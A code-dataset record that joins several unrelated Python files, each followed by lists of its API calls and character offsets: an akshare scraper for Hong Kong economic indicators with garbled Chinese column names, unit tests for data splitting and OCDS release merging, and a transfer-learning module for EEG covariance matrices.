ไธๆน่ดขๅฏ-็ปๆตๆฐๆฎไธ่ง-ไธญๅฝ้ฆๆธฏ-้ฆๆธฏๅถ้ ไธ PPI ๅนด็
https://data.eastmoney.com/cjsj/foreign_8_8.html
:return: ้ฆๆธฏๅถ้ ไธ PPI ๅนด็
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "8",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
if __name__ == "__main__":
macro_china_hk_cpi_df = macro_china_hk_cpi()
print(macro_china_hk_cpi_df)
macro_china_hk_cpi_ratio_df = macro_china_hk_cpi_ratio()
print(macro_china_hk_cpi_ratio_df)
macro_china_hk_rate_of_unemployment_df = macro_china_hk_rate_of_unemployment()
print(macro_china_hk_rate_of_unemployment_df)
macro_china_hk_gbp_df = macro_china_hk_gbp()
print(macro_china_hk_gbp_df)
macro_china_hk_gbp_ratio_df = macro_china_hk_gbp_ratio()
print(macro_china_hk_gbp_ratio_df)
marco_china_hk_building_volume_df = macro_china_hk_building_volume()
print(marco_china_hk_building_volume_df)
macro_china_hk_building_amount_df = macro_china_hk_building_amount()
print(macro_china_hk_building_amount_df)
macro_china_hk_trade_diff_ratio_df = macro_china_hk_trade_diff_ratio()
print(macro_china_hk_trade_diff_ratio_df)
macro_china_hk_ppi_df = macro_china_hk_ppi()
print(macro_china_hk_ppi_df)
|
[
"pandas.to_numeric",
"pandas.to_datetime",
"akshare.utils.demjson.decode",
"requests.get"
] |
[((751, 783), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (763, 783), False, 'import requests\n'), ((823, 854), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (837, 854), False, 'from akshare.utils import demjson\n'), ((1043, 1071), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (1056, 1071), True, 'import pandas as pd\n'), ((1092, 1120), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (1105, 1120), True, 'import pandas as pd\n'), ((1805, 1837), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (1817, 1837), False, 'import requests\n'), ((1877, 1908), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (1891, 1908), False, 'from akshare.utils import demjson\n'), ((2097, 2125), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (2110, 2125), True, 'import pandas as pd\n'), ((2146, 2174), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (2159, 2174), True, 'import pandas as pd\n'), ((2858, 2890), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (2870, 2890), False, 'import requests\n'), ((2930, 2961), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (2944, 2961), False, 'from akshare.utils import demjson\n'), ((3150, 3178), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (3163, 3178), True, 'import pandas as pd\n'), ((3199, 3227), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (3212, 3227), True, 'import pandas as pd\n'), ((3900, 3932), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (3912, 3932), False, 'import requests\n'), ((3972, 4003), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (3986, 4003), False, 'from akshare.utils import demjson\n'), ((4966, 4998), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (4978, 4998), False, 'import requests\n'), ((5038, 5069), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (5052, 5069), False, 'from akshare.utils import demjson\n'), ((5258, 5286), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (5271, 5286), True, 'import pandas as pd\n'), ((5307, 5335), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (5320, 5335), True, 'import pandas as pd\n'), ((6028, 6060), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (6040, 6060), False, 'import requests\n'), ((6100, 6131), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (6114, 6131), False, 'from akshare.utils import demjson\n'), ((6320, 6348), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (6333, 6348), True, 'import pandas as pd\n'), ((6369, 6397), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (6382, 6397), True, 'import pandas as pd\n'), ((7094, 7126), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (7106, 7126), False, 'import requests\n'), ((7166, 7197), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (7180, 7197), False, 'from akshare.utils import demjson\n'), ((8169, 8201), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (8181, 8201), False, 'import requests\n'), ((8241, 8272), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (8255, 8272), False, 'from akshare.utils import demjson\n'), ((8461, 8489), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (8474, 8489), True, 'import pandas as pd\n'), ((8510, 8538), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (8523, 8538), True, 'import pandas as pd\n'), ((9223, 9255), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (9235, 9255), False, 'import requests\n'), ((9295, 9326), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (9309, 9326), False, 'from akshare.utils import demjson\n'), ((9515, 9543), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (9528, 9543), True, 'import pandas as pd\n'), ((9564, 9592), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (9577, 9592), True, 'import pandas as pd\n'), ((4192, 4220), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (4205, 4220), True, 'import pandas as pd\n'), ((4247, 4275), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (4260, 4275), True, 'import pandas as pd\n'), ((7386, 7414), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (7399, 7414), True, 'import pandas as pd\n'), ((7441, 7469), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (7454, 7469), True, 'import pandas as pd\n'), ((1141, 1170), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (1155, 1170), True, 'import pandas as pd\n'), ((1205, 1236), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (1219, 1236), True, 'import pandas as pd\n'), ((2195, 2224), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (2209, 2224), True, 'import pandas as pd\n'), ((2259, 2290), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (2273, 2290), True, 'import pandas as pd\n'), ((3248, 3277), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (3262, 3277), True, 'import pandas as pd\n'), ((3312, 3343), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (3326, 3343), True, 'import pandas as pd\n'), ((4302, 4331), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (4316, 4331), True, 'import pandas as pd\n'), ((4366, 4397), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (4380, 4397), True, 'import pandas as pd\n'), ((5356, 5385), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (5370, 5385), True, 'import pandas as pd\n'), ((5420, 5451), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (5434, 5451), True, 'import pandas as pd\n'), ((6418, 6447), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (6432, 6447), True, 'import pandas as pd\n'), ((6482, 6513), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (6496, 6513), True, 'import pandas as pd\n'), ((7496, 7525), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (7510, 7525), True, 'import pandas as pd\n'), ((7560, 7591), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (7574, 7591), True, 'import pandas as pd\n'), ((8559, 8588), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (8573, 8588), True, 'import pandas as pd\n'), ((8623, 8654), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (8637, 8654), True, 'import pandas as pd\n'), ((9613, 9642), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๆถ้ด']"], {}), "(temp_df['ๆถ้ด'])\n", (9627, 9642), True, 'import pandas as pd\n'), ((9677, 9708), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['ๅๅธๆฅๆ']"], {}), "(temp_df['ๅๅธๆฅๆ'])\n", (9691, 9708), True, 'import pandas as pd\n')]
|
import unittest
import logging
from util.data import load_data, split_train_test_validation, make_dataset, preprocess
logger = logging.getLogger(__name__)
class DataTestCase(unittest.TestCase):
def setUp(self) -> None:
self.assets = load_data('../data')
self.symbol = next(iter(self.assets.keys()))
self.asset = preprocess(self.assets[self.symbol])
def test_split_data(self):
df_train, df_validation, df_test = split_train_test_validation(self.asset)
def test_make_dataset(self):
df_train, df_validation, df_test = split_train_test_validation(self.asset)
dataset = make_dataset(df_train, sequence_length=252, sequence_stride=50)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"util.data.split_train_test_validation",
"util.data.load_data",
"util.data.preprocess",
"util.data.make_dataset",
"logging.getLogger"
] |
[((130, 157), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (147, 157), False, 'import logging\n'), ((730, 745), 'unittest.main', 'unittest.main', ([], {}), '()\n', (743, 745), False, 'import unittest\n'), ((251, 271), 'util.data.load_data', 'load_data', (['"""../data"""'], {}), "('../data')\n", (260, 271), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((346, 382), 'util.data.preprocess', 'preprocess', (['self.assets[self.symbol]'], {}), '(self.assets[self.symbol])\n', (356, 382), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((458, 497), 'util.data.split_train_test_validation', 'split_train_test_validation', (['self.asset'], {}), '(self.asset)\n', (485, 497), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((575, 614), 'util.data.split_train_test_validation', 'split_train_test_validation', (['self.asset'], {}), '(self.asset)\n', (602, 614), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((633, 696), 'util.data.make_dataset', 'make_dataset', (['df_train'], {'sequence_length': '(252)', 'sequence_stride': '(50)'}), '(df_train, sequence_length=252, sequence_stride=50)\n', (645, 696), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n')]
|
import json
import os.path
import re
from copy import deepcopy
from glob import glob
import pytest
from ocdsmerge import CompiledRelease, Merger, VersionedRelease
from ocdsmerge.exceptions import (InconsistentTypeError, MissingDateKeyError, NonObjectReleaseError,
NonStringDateValueError, NullDateValueError)
from tests import load, path, schema_url, tags
def get_test_cases():
test_merge_argvalues = []
simple_schema = path('schema.json')
for minor_version, schema in (('1.1', None), ('1.1', schema_url), ('1.0', schema_url), ('schema', simple_schema)):
if schema and schema.startswith('http'):
schema = schema.format(tags[minor_version])
for suffix in ('compiled', 'versioned'):
filenames = glob(path(os.path.join(minor_version, f'*-{suffix}.json')))
assert len(filenames), f'{suffix} fixtures not found'
test_merge_argvalues += [(filename, schema) for filename in filenames]
return test_merge_argvalues
@pytest.mark.vcr()
@pytest.mark.parametrize('error, data', [
(MissingDateKeyError, {}),
(NullDateValueError, {'date': None}),
(NonStringDateValueError, {'date': {}}),
(NonObjectReleaseError, '{}'),
(NonObjectReleaseError, b'{}'),
(NonObjectReleaseError, []),
(NonObjectReleaseError, tuple()),
(NonObjectReleaseError, set()),
])
def test_errors(error, data, empty_merger):
for infix in ('compiled', 'versioned'):
with pytest.raises(error):
getattr(empty_merger, f'create_{infix}_release')([{'date': '2010-01-01'}, data])
if not isinstance(data, dict):
with pytest.raises(error):
empty_merger.create_compiled_release([data])
else:
release = deepcopy(data)
expected = {
'id': f"None-{data.get('date')}",
'tag': ['compiled'],
}
if data.get('date') is not None:
expected['date'] = data['date']
assert empty_merger.create_compiled_release([release]) == expected
if not isinstance(data, dict):
with pytest.raises(error):
empty_merger.create_versioned_release([data])
else:
release = deepcopy(data)
release['initiationType'] = 'tender'
expected = {
'initiationType': [{
'releaseID': None,
'releaseDate': data.get('date'),
'releaseTag': None,
'value': 'tender',
}],
}
assert empty_merger.create_versioned_release([release]) == expected
@pytest.mark.vcr()
def test_key_error(empty_merger):
with pytest.raises(KeyError) as excinfo:
empty_merger.create_compiled_release([{'date': '2010-01-01'}, {}])
message = 'The `date` field of at least one release is missing.'
assert excinfo.value.key == 'date'
assert excinfo.value.message == message
assert str(excinfo.value) == message
@pytest.mark.vcr()
@pytest.mark.parametrize('filename,schema', get_test_cases())
def test_merge(filename, schema):
merger = Merger(schema)
if filename.endswith('-compiled.json'):
infix = 'compiled'
else:
infix = 'versioned'
with open(filename) as f:
expected = json.load(f)
with open(re.sub(r'-(?:compiled|versioned)', '', filename)) as f:
releases = json.load(f)
original = deepcopy(releases)
actual = getattr(merger, f'create_{infix}_release')(releases)
assert releases == original
assert actual == expected, filename + '\n' + json.dumps(actual)
@pytest.mark.vcr()
@pytest.mark.parametrize('infix,cls', [('compiled', CompiledRelease), ('versioned', VersionedRelease)])
def test_extend(infix, cls, empty_merger):
expected = load(os.path.join('1.1', f'lists-{infix}.json'))
releases = load(os.path.join('1.1', 'lists.json'))
merged_release = getattr(empty_merger, f'create_{infix}_release')(releases[:1])
merger = cls(merged_release, merge_rules=empty_merger.merge_rules)
merger.extend(releases[1:])
assert merger.asdict() == expected
merger = cls(merged_release, schema={})
merger.extend(releases[1:])
assert merger.asdict() == expected
@pytest.mark.vcr()
@pytest.mark.parametrize('infix,cls', [('compiled', CompiledRelease), ('versioned', VersionedRelease)])
def test_append(infix, cls, empty_merger):
expected = load(os.path.join('1.1', f'lists-{infix}.json'))
releases = load(os.path.join('1.1', 'lists.json'))
merged_release = getattr(empty_merger, f'create_{infix}_release')(releases[:1])
merger = cls(merged_release, merge_rules=empty_merger.merge_rules)
merger.append(releases[1])
assert merger.asdict() == expected
merger = cls(merged_release, schema={})
merger.extend(releases[1:])
assert merger.asdict() == expected
def test_inconsistent_type(empty_merger):
data = [{
"date": "2000-01-01T00:00:00Z",
"integer": 1
}, {
"date": "2000-01-02T00:00:00Z",
"integer": {
"object": 1
}
}]
with pytest.raises(InconsistentTypeError) as excinfo:
empty_merger.create_compiled_release(data)
assert str(excinfo.value) == "An earlier release had the literal 1 for /integer, but the current release has an object with a 'object' key" # noqa: E501
@pytest.mark.parametrize('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])
def test_merge_when_array_is_mixed(i, j, simple_merger):
data = [{
"ocid": "ocds-213czf-A",
"id": "1",
"date": "2000-01-01T00:00:00Z",
"mixedArray": [
{"id": 1},
"foo"
]
}, {
"ocid": "ocds-213czf-A",
"id": "2",
"date": "2000-01-02T00:00:00Z",
"mixedArray": [
{"id": 2},
"bar"
]
}]
output = {
'tag': ['compiled'],
'id': 'ocds-213czf-A-2000-01-02T00:00:00Z',
'date': '2000-01-02T00:00:00Z',
'ocid': 'ocds-213czf-A',
'mixedArray': [
{'id': 2},
'bar',
],
}
assert simple_merger.create_compiled_release(data) == output
actual = deepcopy(data)
expected = deepcopy(output)
del actual[i]['mixedArray'][j]
if i == 1:
del expected['mixedArray'][j]
assert simple_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
@pytest.mark.parametrize('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])
def test_merge_when_array_is_mixed_without_schema(i, j, empty_merger):
data = [{
'ocid': 'ocds-213czf-A',
"id": "1",
"date": "2000-01-01T00:00:00Z",
"mixedArray": [
{"id": 1},
"foo"
]
}, {
'ocid': 'ocds-213czf-A',
"id": "2",
"date": "2000-01-02T00:00:00Z",
"mixedArray": [
{"id": 2},
"bar"
]
}]
output = {
'tag': ['compiled'],
'id': 'ocds-213czf-A-2000-01-02T00:00:00Z',
'date': '2000-01-02T00:00:00Z',
'ocid': 'ocds-213czf-A',
'mixedArray': [
{'id': 2},
'bar',
],
}
assert empty_merger.create_compiled_release(data) == output
actual = deepcopy(data)
expected = deepcopy(output)
del actual[i]['mixedArray'][j]
if i == 1:
del expected['mixedArray'][j]
if j == 0:
assert empty_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
else:
with pytest.raises(AssertionError):
assert empty_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
|
[
"ocdsmerge.Merger",
"copy.deepcopy",
"json.load",
"pytest.mark.vcr",
"tests.path",
"json.dumps",
"pytest.raises",
"pytest.mark.parametrize",
"re.sub"
] |
[((1030, 1047), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (1045, 1047), False, 'import pytest\n'), ((2582, 2599), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (2597, 2599), False, 'import pytest\n'), ((2952, 2969), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (2967, 2969), False, 'import pytest\n'), ((3574, 3591), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (3589, 3591), False, 'import pytest\n'), ((3593, 3700), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""infix,cls"""', "[('compiled', CompiledRelease), ('versioned', VersionedRelease)]"], {}), "('infix,cls', [('compiled', CompiledRelease), (\n 'versioned', VersionedRelease)])\n", (3616, 3700), False, 'import pytest\n'), ((4207, 4224), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (4222, 4224), False, 'import pytest\n'), ((4226, 4333), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""infix,cls"""', "[('compiled', CompiledRelease), ('versioned', VersionedRelease)]"], {}), "('infix,cls', [('compiled', CompiledRelease), (\n 'versioned', VersionedRelease)])\n", (4249, 4333), False, 'import pytest\n'), ((5338, 5402), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""i,j"""', '[(0, 0), (0, 1), (1, 0), (1, 1)]'], {}), "('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])\n", (5361, 5402), False, 'import pytest\n'), ((6425, 6489), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""i,j"""', '[(0, 0), (0, 1), (1, 0), (1, 1)]'], {}), "('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])\n", (6448, 6489), False, 'import pytest\n'), ((467, 486), 'tests.path', 'path', (['"""schema.json"""'], {}), "('schema.json')\n", (471, 486), False, 'from tests import load, path, schema_url, tags\n'), ((3079, 3093), 'ocdsmerge.Merger', 'Merger', (['schema'], {}), '(schema)\n', (3085, 3093), False, 'from ocdsmerge import CompiledRelease, Merger, VersionedRelease\n'), ((3385, 3403), 'copy.deepcopy', 'deepcopy', (['releases'], {}), '(releases)\n', (3393, 3403), False, 'from copy import deepcopy\n'), ((6157, 6171), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (6165, 6171), False, 'from copy import deepcopy\n'), ((6187, 6203), 'copy.deepcopy', 'deepcopy', (['output'], {}), '(output)\n', (6195, 6203), False, 'from copy import deepcopy\n'), ((7257, 7271), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (7265, 7271), False, 'from copy import deepcopy\n'), ((7287, 7303), 'copy.deepcopy', 'deepcopy', (['output'], {}), '(output)\n', (7295, 7303), False, 'from copy import deepcopy\n'), ((1761, 1775), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (1769, 1775), False, 'from copy import deepcopy\n'), ((2206, 2220), 'copy.deepcopy', 'deepcopy', (['data'], {}), '(data)\n', (2214, 2220), False, 'from copy import deepcopy\n'), ((2643, 2666), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (2656, 2666), False, 'import pytest\n'), ((3254, 3266), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3263, 3266), False, 'import json\n'), ((3356, 3368), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3365, 3368), False, 'import json\n'), ((3552, 3570), 'json.dumps', 'json.dumps', (['actual'], {}), '(actual)\n', (3562, 3570), False, 'import json\n'), ((5076, 5112), 'pytest.raises', 'pytest.raises', (['InconsistentTypeError'], {}), '(InconsistentTypeError)\n', (5089, 5112), False, 'import pytest\n'), ((1490, 1510), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (1503, 1510), False, 'import pytest\n'), ((1654, 1674), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (1667, 1674), False, 'import pytest\n'), ((2098, 2118), 'pytest.raises', 'pytest.raises', (['error'], {}), '(error)\n', (2111, 2118), False, 'import pytest\n'), ((3281, 3328), 're.sub', 're.sub', (['"""-(?:compiled|versioned)"""', '""""""', 'filename'], {}), "('-(?:compiled|versioned)', '', filename)\n", (3287, 3328), False, 'import re\n'), ((7567, 7596), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (7580, 7596), False, 'import pytest\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 23 15:57:12 2018
@author: coelhorp
"""
import numpy as np
from sklearn.metrics import roc_auc_score
from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot
from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300
from rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300
def RPA_recenter(source, target_train, target_test, paradigm='MI', weight_samples=False):
if paradigm == 'P300':
return transform_org2rct_p300(source, target_train, target_test, weight_samples)
else:
return transform_org2rct(source, target_train, target_test)
def RPA_stretch(source, target_train, target_test, paradigm='MI'):
return transform_rct2str(source, target_train, target_test)
def RPA_rotate(source, target_train, target_test, paradigm='MI', class_weights=None, distance='euc'):
if paradigm == 'P300':
return transform_rct2rot_p300(source, target_train, target_test, class_weights, distance)
else:
return transform_rct2rot(source, target_train, target_test, class_weights, distance)
def get_sourcetarget_split(source, target, ncovs_train, paradigm='MI'):
if (paradigm == 'P300'):
return get_sourcetarget_split_p300(source, target, ncovs_train)
else:
return get_sourcetarget_split_motorimagery(source, target, ncovs_train)
def get_score_notransfer(clf, target_train, target_test, paradigm='MI'):
covs_train = target_train['covs']
y_train = target_train['labels']
covs_test = target_test['covs']
y_test = target_test['labels']
clf.fit(covs_train, y_train)
y_pred = clf.predict(covs_test)
y_test = np.array([y_test == i for i in np.unique(y_test)]).T
y_pred = np.array([y_pred == i for i in np.unique(y_pred)]).T
return roc_auc_score(y_test, y_pred)
def get_score_transferlearning(clf, source, target_train, target_test, paradigm='MI'):
covs_source, y_source = source['covs'], source['labels']
covs_target_train, y_target_train = target_train['covs'], target_train['labels']
covs_target_test, y_target_test = target_test['covs'], target_test['labels']
covs_train = np.concatenate([covs_source, covs_target_train])
y_train = np.concatenate([y_source, y_target_train])
clf.fit(covs_train, y_train)
covs_test = covs_target_test
y_test = y_target_test
y_pred = clf.predict(covs_test)
y_test = np.array([y_test == i for i in np.unique(y_test)]).T
y_pred = np.array([y_pred == i for i in np.unique(y_pred)]).T
return roc_auc_score(y_test, y_pred)
|
[
"rpa.helpers.transfer_learning.utils.get_sourcetarget_split_motorimagery",
"numpy.unique",
"rpa.helpers.transfer_learning.utils.transform_rct2rot",
"sklearn.metrics.roc_auc_score",
"rpa.helpers.transfer_learning.utils.get_sourcetarget_split_p300",
"rpa.helpers.transfer_learning.utils.transform_org2rct_p300",
"rpa.helpers.transfer_learning.utils.transform_rct2str",
"rpa.helpers.transfer_learning.utils.transform_rct2rot_p300",
"rpa.helpers.transfer_learning.utils.transform_org2rct",
"numpy.concatenate"
] |
[((849, 901), 'rpa.helpers.transfer_learning.utils.transform_rct2str', 'transform_rct2str', (['source', 'target_train', 'target_test'], {}), '(source, target_train, target_test)\n', (866, 901), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1934, 1963), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1947, 1963), False, 'from sklearn.metrics import roc_auc_score\n'), ((2298, 2346), 'numpy.concatenate', 'np.concatenate', (['[covs_source, covs_target_train]'], {}), '([covs_source, covs_target_train])\n', (2312, 2346), True, 'import numpy as np\n'), ((2361, 2403), 'numpy.concatenate', 'np.concatenate', (['[y_source, y_target_train]'], {}), '([y_source, y_target_train])\n', (2375, 2403), True, 'import numpy as np\n'), ((2680, 2709), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (2693, 2709), False, 'from sklearn.metrics import roc_auc_score\n'), ((618, 691), 'rpa.helpers.transfer_learning.utils.transform_org2rct_p300', 'transform_org2rct_p300', (['source', 'target_train', 'target_test', 'weight_samples'], {}), '(source, target_train, target_test, weight_samples)\n', (640, 691), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300\n'), ((717, 769), 'rpa.helpers.transfer_learning.utils.transform_org2rct', 'transform_org2rct', (['source', 'target_train', 'target_test'], {}), '(source, target_train, target_test)\n', (734, 769), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1047, 1133), 'rpa.helpers.transfer_learning.utils.transform_rct2rot_p300', 'transform_rct2rot_p300', (['source', 'target_train', 'target_test', 'class_weights', 'distance'], {}), '(source, target_train, target_test, class_weights,\n distance)\n', (1069, 1133), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct_p300, transform_rct2rot_p300\n'), ((1155, 1232), 'rpa.helpers.transfer_learning.utils.transform_rct2rot', 'transform_rct2rot', (['source', 'target_train', 'target_test', 'class_weights', 'distance'], {}), '(source, target_train, target_test, class_weights, distance)\n', (1172, 1232), False, 'from rpa.helpers.transfer_learning.utils import transform_org2rct, transform_rct2str, transform_rct2rot\n'), ((1350, 1406), 'rpa.helpers.transfer_learning.utils.get_sourcetarget_split_p300', 'get_sourcetarget_split_p300', (['source', 'target', 'ncovs_train'], {}), '(source, target, ncovs_train)\n', (1377, 1406), False, 'from 